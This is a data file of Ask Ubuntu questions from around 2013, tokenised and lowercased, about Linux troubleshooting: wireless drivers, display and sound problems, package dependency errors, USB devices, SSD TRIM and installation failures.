261998	dcraw issue with fuji x raf	i have ubuntu 12.04 lts 64bits . i can not decode raw raf fuji x file with the dcraw utility ( report error : corrupt data near 0xdc800 ) as availaible in the `` logithă¨que '' dcraw 8.99-1build1 this is fixed in a new version of this utilities , i compiled the source and install a new dcraw that work fine . but dcraw is used directly or inidirectly by other projects : ufraw , gimp-ufraw , darktable , rawtherapy ... is it possible to have a have a less tedious solution than compile and reinstall all these projects to be able to handle my raf file with theses tools ?
262000	ubuntu on old platform	i have an old pc that i did a complete wipe drive on and would like to install ubuntu 12.10 on it once the dvd order arrives . the pc is an hp pavillion a1610n with an old 2005 vintage amd processor . i do not intend this pc to be `` dual boot '' so what is the proper installation procedure to use ? note : i am not familiar with linux/unix
262002	installation of mysql server 5.5 freezes on ubuntu 12.04 lts	i try to install mysql server 5.5 on a virtual machine running ubuntu 12.04 . after executing sudo apt-get install mysql-server i get this screen : it seems that the installation is frozen . any idea what 's wrong ? how can i leave this screen ? my console does not react to any keyboard input .
262003	how do i get brightness working on a lenovo ideapad yoga ?	i have a lenovo ideapad yoga . it 's been working flawlessly with windows 8 - 9 hour battery life , awesome touchscreen , 4-second boot times . so obviously i wanted to try ubuntu 12.10 . well , i downloaded it and installed it - but i could n't change the brightness ! these hotkeys work in windows but not in ubuntu - and none of the solutions others have proposed in other similar questions with lenovo laptops have worked . how can i make my brightness hotkeys work ?
262005	force dual screen in ubuntu	i 'm trying to control a ubuntu 10.04 machine through a windows 7 machine using putty and xming . meaning , i 'm sending the display from linux to windows through xservice . the ubuntu machine has only one screen and only one screen output on the video card , while the windows 7 machine is dual monitored . i 'm able to request a dual screen display through xming using the -multimonitors switch , but when i do ( in addition to the -fullscreen switch ) , it will only show me one screen . i suspect it is because the ubuntu machine , considering the current configuration , is unable to deal with dual monitors . so i need to find a way to force ubuntu to use dual screens on the driver-level even though only one screen is attached to the machine . is such a thing possible ? if so , how could i do it ?
262008	how do i stop a wireless connection from connecting to an access point on boot ?	i have been unable to find any where , sensible recommendations as to how to prevent my wireless card connecting to open wireless on boot .
262009	can not connect wirelessly on toshiba satellite c855 with 12.04	i am running ubuntu 12.04 on my toshiba satellite c855 and can not connect to any wireless networks . when i run lspci in terminal , it shows : 00:00.0 host bridge : intel corporation ivy bridge dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation panther point usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation panther point pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation panther point pci express root port 2 ( rev c4 ) 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation panther point 6 port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation panther point smbus controller ( rev 04 ) 01:00.0 ethernet controller : atheros communications inc. ar8162 fast ethernet ( rev 10 ) 02:00.0 network controller : realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter ( rev 01 ) i have tried downloading the broadcom sta wireless driver , and it shows as activated in additional drivers , but it does n't seem to be making a difference . please help !
262012	ubuntu 12.10 kernel problem on hp envy m6 ?	im very new in ubuntu . recently bought a laptop hp m6 : intel i5 8gb ram intel graphics hd 4000 i install ubuntu 12.10 64 bits , worked perfectly fine , but when i did the first system update ( updated kernel to 3.0.25 ( generic ) , when i reboot didnt do it it got stuck in the blank purple screen , so i tried to boot form an older kernel 3.0.24 ( generic ) i think , and it works . what could be the problem ? thanks a lot .
262016	how not to show separate browser instance in unity for web apps ?	i 've been working on using the webapps available in ubuntu such as facebook and reddit . i 've been using qle to add more things to the quicklist to add more functionality to them . i was going to include screenshots but i ca n't take a screenshot with the quicklist open . for example , i went to facebook and was prompted to integrate so i did . now i have docked that facebook `` app '' and edited the quicklist to include messages , photos , and friends . the command i 'm using for each is chromium-browser -- app= ( insert link here ) . i run it in `` app '' mode so that it opens fullscreen just for consistency with the facebook app . my problem is that this opens a new chromium instance on the unity bar labeled untitled . is there a way to not have that show ? i 'm hoping to make it look a little more `` native '' such as the window indicators showing on that facebook app instead of showing another browser instance .
262018	white line appears around windows after driver update	i tried to update the video drivers on my ibm thinkpad t42 but now there is a white line around my windows . it is a small white line about 1 pixel wide . the line appears when i open a new windows or change tabs in a window . if i click on the line it will disappear . when i tried to take a screen shot of the line it disappeared . xvidcap does not show the white line either . the white line only appears when windows are full screened .
262022	daily update installation for ubuntu touch	on the following page i see that you have posted the daily updates for the ubuntu for android zip file . there are the image files down below and then there is a zip file above with a .zip.md5sum . i do n't want to flash the image but instead us my android recover to flash the files to install the ubuntu for android update . i know when you guys launched ubuntu for android the first day there were two zips files that i could flash on my phone to install it . would it be the same process for these files ? would i have to rename the second file so it ends with .zip rather then .zip.md5sum in order to flash it ? whats the process of flashing these files ? the instructions on the main page do not referenece the flashable zips so i am assuming that the page has not been updated . thank you and look forward to your reply . my device : google nexus 4 ( mako ) quantal-preinstalled-armel+mako quantal-preinstalled-armel+mako.zip.md5sum daily update files : https : //wiki.ubuntu.com/touch/install
262024	ubuntu tablet / touch / phablet	i just recently found this interesting ubuntu branch - as a `` high end '' specification mentions x86 - is there any way to try touch ubuntu on lenovo x200 tablet ? thanks a lot , best regards . .m .
262026	sound menu options are disabled	accidentally i have removed the pulse audio from my ubuntu 12.04 . but after that i am unable to use the sound applet options of changing output , input volumes and unable to test the output speakers . help me to get rid of this issue . also after that the sound indicator also disappeared from indicator pane .
262031	where to put a dowloaded python module	in ubuntu 12.10 . what is the advised directory to put a downloaded python library ? should i be concerned about confusing apt ?
262035	how to get hdmi sound to tv on asus m3a78-em computer	no hdmi sound to tv on asus m3a78-em computer while my onboard radeon hd 3000-3300 series hdmi on my asus m3a78-em computer sends great video to the tv , i have n't yet got sound on the tv . i am trying to find easy graphical solutions that works . a solution is needed . i searched for dolby in synaptic and added the dolby related aften software . also i have tried various tweaks to start - applications - preferences - pulse audio preferences and other sound software but no success yet in getting sound on the tv . i have tried everything i can think of with no success and i have found no posts showing success . hopefully all the work ubuntu is doing will soon get us sound on the tv .
262036	wireless disabled on 12.10 macbook pro 7.1	i have a mac book pro 7,1 and triple booted it by ( osx10.6 , windows7 , ubuntu12.10 ) every 3 os boots normally and everything is ok. just ubuntu does not recognize my wireless according to this i should have something under additional drivers , but the box is empty . i used the lspci command or lsusb command on terminal no wireless ( broadcom ) driver shows up .
262037	how to reset ubuntu software center application - ubuntu 13.04	i am new to ubuntu and have tried using the ubuntu software center . it shows up but once it opens it does n't respond . can you help me figure out how to reset this application ( ubuntu software center ) ? thanks !
262044	how to avoid in the task bar other workspace application icons ?	what i want is that when i go to ones of my workspaces , in the task bar where all current running app is showed , just appear app in the current workspace . how can i do that ?
262048	run ubuntu without monitor in 12.10	how can i run my ubuntu 12.10 without monitor ? ? ? ? im trying to solve this problem 7 hours please help mee . xorg.conf cant help me . please tell me another solution . i will try everything.. thanks
262054	creating multiple interfaces on openstack instances	i 'm able to have openstack up and running with no issues and i 'm loving it , however , i 'm trying to create extra interfaces on one of my instances and i read under openstack documentation that is possible . openstack-using-multi-nics has anyone been able to follow this article and successfully create multiple interfaces on instances ?
262056	how do i choose which display shows `` full screen '' modes ?	i run ubuntu 12.04 on an laptop . i use the laptop screen and a projector plugged in via vga . when i run presentations in libre impress and click to `` run show '' ( f5 ) , it always shows in my laptop monitor - even if i have the unity bar on the projector screen area and open impress there . the same happens with youtube `` full screen '' mode . i 'd really like to choose which display `` full screen '' works on . i can use the workspace switcher to drag the `` full screen '' window to the other display - but because they 're different resolutions it does n't fit . these full screen modes do n't have the usual minimise/maximise buttons . any ideas ? thanks
262059	accessibility bus error when packaging	when i do quickly package i get the flowing warning . not a big deal but because this warning i ca n't share my package to my ppa . ** ( setup.py:5679 ) : warning ** : could n't register with accessibility bus : did not receive a reply . possible causes include : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken . is there any way this fix this problem ? note : i have renamed my project .
262062	developing gui application for cli ubuntu server	i need to be able to render my own gui to the screen , but i 'm not really sure how to do this considering i 'm in a cli environment . i do n't want to install ubuntu-desktop or anything , i do n't need an entire desktop , just the ability to render directly to the screen . i 've read a bit about x. i assume i need to make something that implements it . are there references that explain this ? i 'm assuming a low level language ( e.g . c ) will be necessary , but obviously i 'd feel more comfortable if it was a higher level language required ( e.g . python ) . please let me know , i ca n't seem to find anything on google . i do n't think i 'm searching for the right thing , perhaps i just need refined search terms . what i 'm developing is an application that i want to install on a single board computer . the computer would only be used for the purpose of this application , so i do n't want to waste resources loading ubuntu-desktop or gnome just so that i can render my application . i really just do n't want the extra overhead . let me know if that changes anything .
262063	how to find python installation directory on ubuntu	i have just migrated from windows environment . i have installed python 3.2 in a separate directory . how can i get the python installation path on ubuntu shell ? is there any way i can let shell know/choose at runtime which python version is to be used for further code execution ? are there any kind of environment variables and search path kind of thing in ubuntu linux as well ?
262064	add directory to path for sudo	i know creating a .bashrc and adding path= $ path : /home/asco/adt-bundle-linux-x86_64/sdk/tools path= $ path : /home/asco/adt-bundle-linux-x86_64/sdk/platform-tools will add those directories to my path . how do i do the same so the programs in those directories will be available with sudo ? i tried the same as su in /root , but that did n't work .
262066	gedit not found on launchbar when i minimize , ubuntu 12.10 .	i updated from 12.04 to 12.10 , and when i minimize gedit , it does n't show up in the launch bar . the only way i 'm able to get it back is to open one of the files that has already been opened in gedit .
262068	how to extract a tar.gz file	i am new to ubuntu and i would like to know how i extract a tar.gz file . thanks !
262075	is there any c/c++ runtime enviorment for ubuntu ?	i am a c/c++ developer . i would like to run my .exe programs on my computer ( which only has ubuntu on it ) . i would like to know if there are any c/c++ runtime enviroments out there .
262079	can i install ubuntu to a machine from a full usb flash drive installation ?	i have a 16 gig flash drive with an installation of ubuntu on it with a bunch of programs and built software . i know that normally a bootable version of ubuntu will have a thing on the desktop to install to the hard drive . how do i replicate this full usb installation on a computer ?
262080	will ubuntu touch at zte grand x in ?	is it possible to use ubuntu touch on zte grand x in ? it works with an intel atom z2460 . i ask because at main page is written something about ubuntu touch and intel atom . i am a developer and i want to know more . thanks for your answer .
262081	ca n't login ( unexpected eof in .profile )	i am having a problem with login . its in a cycle login with password correct - > login - > login with password correct - > login . i 've seen a few threads about this matter but none helped . i do ctrl+alt+f2 , when i log in it shows me two errors : -bash : /home/imight/.profile : line 19 unexpected eof while looking for matching -bash : /home/imight/.profile : line 22 : syntax error : unexpected end of file
262088	ca n't install w3af	well i am not able able to install w3af i tired sudo apt-get install w3af it says the following packages have unmet dependencies : w3af : depends : python-pyopenssl e : unable to correct problems , you have held broken packages . for which when i checked is said to be included in python-openssl package which is fairly updated and i also tried sudo apt-get clean to check for the broken dependencies but it returns nothing . so i am not able to decide exactly what to be done ! !
262093	why ca n't i install ubuntu on my computer ?	i have a new msi gt70 with windows 8 , which has the new uefi settings , and it just wo n't install ubuntu 12.10 . i have tried a lot of different options to try and install it . i have tried using nomodeset and acpi=off , but everything has failed . i have even tried going into the bios and turning off fast boot , secure boot , and switched it over to legacy mode . all have got me somewhere in the installation , but it will not actually install ubuntu . by the way i have been using a cd . at first when i just tried to install ubuntu without any special stuff from the bios , a screen with four options would appear . the top option was try ubuntu without installing , then install ubuntu , then oem , and finally check disc for defects . any option i hit enter on would cause my computer to just go to a black screen . next i tried to switch the bios settings to turning off fast boot , secure boot , and switching it to legacy mode . after i did this , i got the furthest with the installation , but it still failed . what happened was , it brought up a new ubuntu menu where six items appeared . they were the same as before with two additional ones that said boot from first hard drive and something else i can not remember.if i entered into any of these options , it would display a bunch of code in like a command prompt , but then at the end , it would go to a black screen yet again . my computer has two internal drives on it , one 128gb ssd and another 750gb hdd . let me know if you need anymore info . i really need to install ubuntu for school . someone please help . thanks in advance .
262094	mount shared ubuntuone folder	is it possible to mount a folder , which is shared by another person into my ubuntu-one folder ( or any other ) to my ubuntu system ( not the web-interface ) . it also would be nice to do this via fstab .
262100	formatting windows 7 partition to give it to ubuntu ?	i have 2 partitions windows7 and ubuntu . both are installed and running well , except i would like to get rid of my windows 7 or at least a part of it and give that space to ubuntu . so i am looking for the best way ( not sure if it 's doable too ) to format my windows 7 partition and give that space to my ubuntu parition .
262102	media players breaking the videos	i have a problem with my media players in ubuntu 12.04 . when i play a video in vlc and sm player , the video is breaking , that means video pause and skip but sound is well . i have installed ati/amd proprietary fglrx graphics driver .
262105	problem updating packages on ubuntu server	i 'll start by saying i'am a total beginner in linux . i have ubuntu 12.04.1 lts installed on a separate machine and i use it for storing data and hosting some services . i usually use webmin to update my packages ( and other simple stuff ) and i did n't do it for quite a while . today i tried to update them and this is what i saw with every single package ( 215 times ) : installing package ( s ) with command apt-get -y install appmenu-gtk .. dpkg : dependency problems prevent configuration of linux-image-generic-pae : linux-image-generic-pae depends on linux-image-3.2.0-37-generic-pae ; however : package linux-image-3.2.0-37-generic-pae is not installed . dpkg : error processing linux-image-generic-pae ( -- configure ) : dependency problems - leaving unconfigured setting up postfix ( 2.9.1-5 ) ... postfix configuration was untouched . if you need to make changes , edit /etc/postfix/main.cf ( and others ) as needed . to view postfix configuration values , see postconf ( 1 ) . after modifying main.cf , be sure to run '/etc/init.d/postfix reload ' . running newaliases newaliases : fatal : bad string length 0 < 1 : setgid_group = dpkg : error processing postfix ( -- configure ) : subprocess installed post-installation script returned error exit status 75 dpkg : dependency problems prevent configuration of bsd-mailx : bsd-mailx depends on default-mta | mail-transport-agent ; however : package default-mta is not installed . package postfix which provides default-mta is not configured yet . package mail-transport-agent is not installed . package postfix which provides mail-transport-agent is not configured yet . dpkg : error processing bsd-mailx ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic-pae : linux-generic-pae depends on linux-image-generic-pae ( = 3.2.0.37.44 ) ; however : package linux-image-generic-pae is not configured yet . linux-generic-pae depends on linux-headers-generic-pae ( = 3.2.0.37.44 ) ; however : version of linux-headers-generic-pae on system is 3.2.0.38.46. dpkg : error processing linux-generic-pae ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of mailutils : mailutils depends on default-mta | mail-transport-agent ; however : package default-mta is not installed . package postfix which provides default-mta is not configured yet . package mail-transport-agent is not installed . package postfix which provides mail-transport-agent is not configured yet . dpkg : error processing mailutils ( -- configure ) : dependency problems - leaving unconfigured processing triggers for libc-bin ... ldconfig deferred processing now taking place errors were encountered while processing : linux-image-generic-pae postfix bsd-mailx linux-generic-pae mailutils reading package lists ... building dependency tree ... reading state information ... you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : linux-generic-pae : depends : linux-headers-generic-pae ( = 3.2.0.37.44 ) but 3.2.0.38.46 is to be installed linux-image-generic-pae : depends : linux-image-3.2.0-37-generic-pae but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . as adviced in this error message i connected through ssh and run : sudo apt-get -f install here is the result : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : gir1.2-gconf-2.0 libutouch-grail1 libunity6 libidl-common libglew1.5 linux-headers-3.2.0-25 linux-headers-3.2.0-25-generic-pae libglewmx1.5 libutouch-evemu1 libidl0 libdee-1.0-1 libutouch-frame1 linux-headers-3.2.0-25-generic liborbit2 libutouch-geis1 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : linux-generic-pae linux-image-3.2.0-38-generic-pae linux-image-generic-pae suggested packages : fdutils linux-doc-3.2.0 linux-source-3.2.0 linux-tools the following new packages will be installed : linux-image-3.2.0-38-generic-pae the following packages will be upgraded : linux-generic-pae linux-image-generic-pae 2 upgraded , 1 newly installed , 0 to remove and 217 not upgraded . 5 not fully installed or removed . need to get 0 b/38.2 mb of archives . after this operation , 113 mb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 526203 files and directories currently installed . ) unpacking linux-image-3.2.0-38-generic-pae ( from ... /linux-image-3.2.0-38-generic-pae_3.2.0-38.61_i386.deb ) ... done . dpkg : error processing /var/cache/apt/archives/linux-image-3.2.0-38-generic-pae_3.2.0-38.61_i386.deb ( -- unpack ) : failed in write on buffer copy for backend dpkg-deb during `./boot/vmlinuz-3.2.0-38-generic-pae ' : no space left on device no apport report written because the error message indicates a disk full error dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.2.0-38-generic-pae /boot/vmlinuz-3.2.0-38-generic-pae run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.2.0-38-generic-pae /boot/vmlinuz-3.2.0-38-generic-pae errors were encountered while processing : /var/cache/apt/archives/linux-image-3.2.0-38-generic-pae_3.2.0-38.61_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) generally , i can see that i have a problem with linux-image-3.2.0-37-generic-pae or simply `` linux kernel image '' . can you please suggest any steps that i should take to fix that ? or maybe there is a way to reinstall ubuntu components without messing up my configurations ? ( kinda like in windows ? ) please keep in mind i'am a beginner user .
262107	headphone jack does n't work in windows 7 since installing unbuntu	i installed unbuntu 12.04 lts 64 bit fine with a cd on a differant partition speakers and headphones work fine in unbuntu but only the speakers work in windows 7. the mic works fine in both , the only thing i can think of is it could be something with unbuntu ? i fairly new to using unbuntu so any help is appreciated .
262111	update from ubuntu 10.10 to 12.10	so i am running this really outdated version of ubuntu and i want do upgrade it without loosing data but cant . need help
262112	using proxy with online flash games	when i try to play this flash online game `` tankionline.com '' using our university proxy i get this error `` can not establish connection ( host : 62.152.57.11 , ports : 4444,5190,5223,5222,5050 ) '' . in windows i use `` microsoft firewall client for isa server '' to solve this problem . how can i solve it in ubuntu ? the problem is not from the browser because i have tried different ones and nothing worked . thanks
262117	booting linux from external hd connected to usb port on a mac mini	i have an external disk ( usb ) with ubuntu linux 12.04 . i connect it to any of my windows pcs to run linux when necessary ( modifying the bios to boot from the usb drive ) . i recently acquired a mac mini . i wonder if i could do the same thing , meaning , selecting the external drive where the linux os is located from the start up manager in the mac , and booting from it . anybody here has experience doing what i 'm considering ? thanks .
262118	is there an irc client for ubuntu with inline media ?	does any irc client exist for ubuntu which displays media inline ( perhaps via plugin ) ? a few irc clients for mac os x ( e.g . textual and limechat ) support inline media and will auto-embed linked images : if someone posts a url to the channel , the irc client displays it inline if it is able to be embedded , like a .jpg or .png image . however , i can not find a client for ubuntu with this feature . the closest i can find is quassel , which can display a url preview on mouse hover , but that 's not the feature i 'm requesting and the webkit support for this preview is not enabled in the ubuntu packaged build on 12.04 . to illustrate : without the feature , you get just text : < rduplain > | askubuntu.com < bot > | http : //cdn.sstatic.net/askubuntu/img/bg-newuser.png < rduplain > | good luck with the feature , the chat view is expanded and the image is inserted : < rduplain > | askubuntu.com < bot > | http : //cdn.sstatic.net/askubuntu/img/bg-newuser.png < rduplain > | good luck
262119	is there to tell if ubuntu wo n't support certain printers ?	my system ca n't find a driver for a dell photo 924 ( i downloaded an executable installation app but it bombs ) . also it ca n't seem to find my wireless network printer , a canon mp560 . thanks for any help ...
262120	qt creator does n't work as expected while following phone os tutorial	i 've been following the instructions to work with developing mobile apps for the phone os you have just made available . however , i 'm having significant difficultly with qt creator following the steps you 've outlined in your tutorial . any advice is welcome . qt creator will open , most of the plug-ins will not load though . when i create a new project i can not find the template you mentioned for the base ui in your tutorial . i 'm using qt creator 2.6.82 , based on qt 5.0.1 ( 64 bit ) , built on feb 21 2013 at 06:24:08 . thanks . rod
262121	why removing amazon also remove other packages ?	if i want to uninstall the amazon webapp that comes by default in the newest versions of ubuntu , it ask me to remove other software as well . as you can see in the next picture , it is forcing me to uninstall unity-webapps-livemail and unity-webapps-youtube . is this a bug in ubuntu or is this intentioned ? this behavior will disappear in future releases of ubuntu ?
262125	blank screen at login 12.04	basically i have a blank screen at the login after i have entered my password and have tried running in 2d and various other methods including downloading ubuntu again and creating a bootable usb however none of these work since i do n't have any permissions to run things in a guest account . i have tried and failed with the terminal entering an array of commands that all require a user not guest account . i ca n't make another usb since i have no windows pc and ubuntu wo n't let me use any downloaded programme . i have just un-installed windows to be able to use ubuntu and really have no idea where to go from here . thanks for reading lol mark
262127	how to recover encrypted deja-dup backup from new install ?	i have a backup of my documents stored in the ubuntu one cloud . i used the default deja-dup backup application and i have enabled encyption . i was running ubuntu 13.04 daily build but as the school projects started to be a bit more important i was clever enough to turn to the latest lts version , which is where i am now . the question is , how do i recover the backups done by my previous installation on my current setup ? i have tried using the deja-dup app and choose `` restore '' and paste the url to the backup into it , but then it says `` there is no backup to restore '' ( or similar , i 'm on a danish translation ) . the url which i am trying to recover from looks like this : ~/deja-dup/thinkpad-4-semester and that is the same url i see if i use the web-interface from one.ubuntu.com to look at my backup . unfortunately there is no option to download the files from the web-interface ( probably because the encryption , dough ... ) , the only options i have available there is `` share folder '' and `` stop syncing this folder '' . appreciate all help thanks : )
262131	amd driver on ubuntu 12.04lts : pc running in low graphics mode	my big problem is , that i can not get the amd driver working on ubuntu 12.04lts . after install the run with terminal , it says `` pc running in low graphics mode . please configure driver yourself ! '' any ides how to fix this ? i 've tried almost everything out which i could fin in the internet ! just one site worked for me , but i was n't able to relocate it again . thanks !
262132	how do i create a user on ubuntu touch for my tablet ? ( nexus 10 )	is there a way to create your own user account in ubuntu touch on my nexus 10 tablet ?
262137	installation stuck at copying files after booting	used windows installer to install ubuntu in a toshiba qosmio f50 , using windows vista . after rebooting , ubuntu installation started but got stuck at roughly around 70 % as it mentions `` almost finished copying files .. '' what should i do ? ? please advise .
262138	kubuntu - vlc or smplayer video quality settings for hd movies ( mkv etc ... )	i have ubuntu 12.04.02 with kde 4.10 with 3d effects . i have a recent very fast pc . i have a ati msi r6870 video card fglrx proprietary drivers 13.1 . i have used video tearing option to reduce video tearing . i would like to know the best quality video settings for vlc or smplayer for hd mkv videos . in particular i have seen these settings : video output/output driver accelerated video output ( overlay ) deinterlacing and deinterlacing type gpu accelerated decoding and other codecs options filters ( i think sharpen is good maybe ) and other advanced video settings thanks
262141	gamepad usb error -71	i have a couple of game-pads with a usb interface , the game-pads are rockfire qf-501uv , when connecting them to the usb port i get the following message : feb 27 22:32:55 localhost kernel : [ 97408.112022 ] usb 5-1 : new low-speed usb device number 28 using uhci_hcd feb 27 22:32:55 localhost kernel : [ 97408.232024 ] usb 5-1 : device descriptor read/64 , error -71 feb 27 22:32:55 localhost kernel : [ 97408.456033 ] usb 5-1 : device descriptor read/64 , error -71 feb 27 22:32:55 localhost kernel : [ 97408.672024 ] usb 5-1 : new low-speed usb device number 29 using uhci_hcd feb 27 22:32:56 localhost kernel : [ 97408.792020 ] usb 5-1 : device descriptor read/64 , error -71 feb 27 22:32:56 localhost kernel : [ 97409.016018 ] usb 5-1 : device descriptor read/64 , error -71 feb 27 22:32:56 localhost kernel : [ 97409.232039 ] usb 5-1 : new low-speed usb device number 30 using uhci_hcd feb 27 22:32:56 localhost kernel : [ 97409.640020 ] usb 5-1 : device not accepting address 30 , error -71 feb 27 22:32:57 localhost kernel : [ 97409.752024 ] usb 5-1 : new low-speed usb device number 31 using uhci_hcd feb 27 22:32:57 localhost kernel : [ 97410.160020 ] usb 5-1 : device not accepting address 31 , error -71 feb 27 22:32:57 localhost kernel : [ 97410.160038 ] hub 5-0:1.0 : unable to enumerate usb device on port 1 googling i 've found some people had similar ( but not the same ) issues with usb devices , some suggested solutions which did not work for me . i 've tried the followings and it did n't work ( same messages ) : echo -1 > /sys/module/usbcore/parameters/autosuspend echo y > /sys/module/usbcore/parameters/use_both_schemes echo -n 0000\:00\:1d.7 > /sys/bus/pci/drivers/ehci_hcd/unbind where ( before executing the last command ) : # ls /sys/bus/pci/drivers/ehci_hcd 0000:00:1d.7 bind module new_id remove_id uevent unbind all as root and after every command i 've checked to see if there is any difference . linux does n't even recognize the usb which attached # lsusb bus 005 device 023 : id 046d : c52e logitech , inc . bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub linux 3.5.0-25-generic # 38-ubuntu smp i686 i686 i686 gnu/linux thanks
262144	system running in low graphic mode ( ubuntu without monitor )	i have ubuntu desktop 12.10 . i want to have a desktop server but it ca n't start without a monitor . i tried ubuntu server but i got the same error . everything is working fine while monitor is connected , but when i disable the monitor and reboot the pc , ubuntu does not start . it says `` system in running in low graphic mode '' . please tell me a solution for this . any app that will `` simulate '' monitor for remote controlling . thanks ...
262154	trim and ssd with usb 3.0 enclosure does not work - uasp not supported ?	i have installed one ssd disk ( micron c400-mtfddac128mam ) in an external usb 3.0 enclosure . now i want use this disk as second disk in my laptop with ubuntu 12.04 . disk is working , but i want to use trim suppport which is not working as expected . check for trim support : user @ server : ~ $ sudo hdparm -i /dev/sdc | grep -i trim * data set management trim supported ( limit 8 blocks ) * deterministic read data after trim disk was mounted with following options : /dev/sdc1 on /media/micron type ext4 ( rw , nosuid , nodev , uhelper=udisks ) but when i run the trim command manually i get an error : user @ server : ~ $ sudo fstrim -v /media/micron/ fstrim : /media/micron/ : fitrim ioctl failed : operation not permitted i used this disk before as an internal disk and trim was working , please assist me thank you . here some usb details : [ 1039.248050 ] usb 4-1 : new superspeed usb device number 4 using xhci_hcd [ 1039.265597 ] scsi8 : usb-storage 4-1:1.0 [ 1041.547879 ] scsi 8:0:0:0 : direct-access c400-mtf ddac128mam 0509 pq : 0 ansi : 5 [ 1041.549134 ] sd 8:0:0:0 : attached scsi generic sg2 type 0 [ 1041.550511 ] sd 8:0:0:0 : [ sdc ] 250069680 512-byte logical blocks : ( 128 gb/119 gib ) [ 1041.550778 ] sd 8:0:0:0 : [ sdc ] write protect is off [ 1041.550785 ] sd 8:0:0:0 : [ sdc ] mode sense : 23 00 00 00 [ 1041.552520 ] sd 8:0:0:0 : [ sdc ] no caching mode page present [ 1041.552528 ] sd 8:0:0:0 : [ sdc ] assuming drive cache : write through [ 1041.554029 ] sd 8:0:0:0 : [ sdc ] no caching mode page present [ 1041.554035 ] sd 8:0:0:0 : [ sdc ] assuming drive cache : write through [ 1041.678373 ] sdc : sdc1 [ 1041.679982 ] sd 8:0:0:0 : [ sdc ] no caching mode page present [ 1041.679991 ] sd 8:0:0:0 : [ sdc ] assuming drive cache : write through [ 1041.679997 ] sd 8:0:0:0 : [ sdc ] attached scsi disk how to find out if the mass storage device using the uasp ( usb attached scsi protocol ) which should support trim ? kind regards luckyrings
262155	how do i connect to wireless network with hidden ssid on ubuntu touch ?	i have created this question because of this downvoted and closed one . come on ... this is linux and everything is possible . the current daily build of the ubuntu touch does n't allow to connect to wifi networks with hidden ssid through gui . how do i connect to hidden wifi on the ubuntu touch ?
262157	both webmin & ispconfig wo n't work on my ubuntu linode	i followed the steps on this page to download and setup webmin on my linode ubuntu server , however , when i try to visit https + my.ip.add.ress + :10000 , the page just hangs and nothing loads . i already looked into my firewall settings . i uninstalled webmin and installed ispconfig and all its dependencies , and the same thing happens at https + my.ip.add.ress + :8080 . this is my first time managing a server so there could be something i overlooked . but my server is a pretty vanilla ubuntu 12.10 with lamp stack installed exactly as per the instructions in linode 's documentation .
262159	help i haved no wireless sinced installing updates on 12.10	obviously a step by step guide would be very helpful please as i 'm new to this inputting code lark . i had a wireless connection when i installed ubuntu 12.10 from the cd once it installed it suggested there was 126 updates so i installed those and my wireless connection has stopped . i 've tried looking at other posts but find that i end going round in circles , what i 'm after is the answer in a step be step format without having go around the houses looking at a thousand other posts with similar problems . below is what popped up in the terminal hopefully theres some kind person out there that understands what the problem is ... . bcmwl-kernel-source_5.100.82.112+bdcom-0ubuntu3_amd64.deb ) ... removing all dkms modules done . unpacking replacement bcmwl-kernel-source ... setting up bcmwl-kernel-source ( 5.100.82.112+bdcom-0ubuntu3 ) ... loading new bcmwl-5.100.82.112+bdcom dkms files ... building only for 3.5.0-25-generic building for architecture x86_64 module build for the currently running kernel was skipped since the kernel source for this kernel does not seem to be installed . error : module b43 does not exist in /proc/modules error : module b43legacy does not exist in /proc/modules error : module ssb does not exist in /proc/modules error : module bcm43xx does not exist in /proc/modules error : module brcm80211 does not exist in /proc/modules error : module brcmfmac does not exist in /proc/modules error : module brcmsmac does not exist in /proc/modules error : module bcma does not exist in /proc/modules fatal : module wl not found . fatal : error running install command for wl update-initramfs : deferring update ( trigger activated ) processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.5.0-25-generic thanks for your help john
